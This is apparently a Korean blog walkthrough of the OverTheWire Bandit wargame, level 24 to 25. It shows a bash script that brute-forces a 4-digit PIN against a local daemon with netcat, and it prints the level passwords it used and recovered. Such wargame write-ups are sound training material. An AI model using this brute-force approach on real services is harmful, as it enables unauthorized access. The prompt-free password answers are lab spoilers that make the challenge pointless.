[Bandit-OverTheWire] Level 24 -> Level 25
두비니
·2020. 9. 25. 16:15
Bandit Level 24 → Level 25Level GoalA daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing. |
접속
접속 : ssh bandit24@bandit.labs.overthewire.org -p2220
pw : UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit24의 비밀번호와 랜덤 4자리숫자를 맞추면 비밀번호를 주겠다고 하네요.
저는 이걸 쉘스크립트로 짰는데 나중에 보니깐 python도 되더라구요. 소켓프로그래밍할사람은 python으로 짜면 될듯
bandit24@bandit:~$ mkdir -p /tmp/dubini3
bandit24@bandit:~$ cd /tmp/dubini3
bandit24@bandit:/tmp/dubini3$ cat > brute.sh
#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for pincode in {0..9}{0..9}{0..9}{0..9}
do
echo $passwd' '$pincode | nc localhost 30002 >> result &
done
^C
bandit24@bandit:/tmp/dubini3$ chmod 777 brute.sh
bandit24@bandit:/tmp/dubini3$ ./brute.sh
일단 저 brute.sh 실행시키면 한참걸리는데 일단 기다렸다가 result파일만 잘 확인하면 됩니다.
bandit24@bandit:/tmp/dubini3$ ls
brute.sh result
bandit24@bandit:/tmp/dubini3$ sort result | uniq -u
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
끝
'War Games > Bandit - OverTheWire' 카테고리의 다른 글
[Bandit-OverTheWire] Level 25 -> Level 26 (0) | 2020.09.25 |
---|---|
[Bandit-OverTheWire] Level 23 -> Level 24 (0) | 2020.09.25 |
[Bandit-OverTheWire] Level 22 -> Level 23 (0) | 2020.09.24 |
[Bandit-OverTheWire] Level 21 -> Level 22 (0) | 2020.09.24 |
[Bandit-OverTheWire] Level 20 -> Level 21 (0) | 2020.09.24 |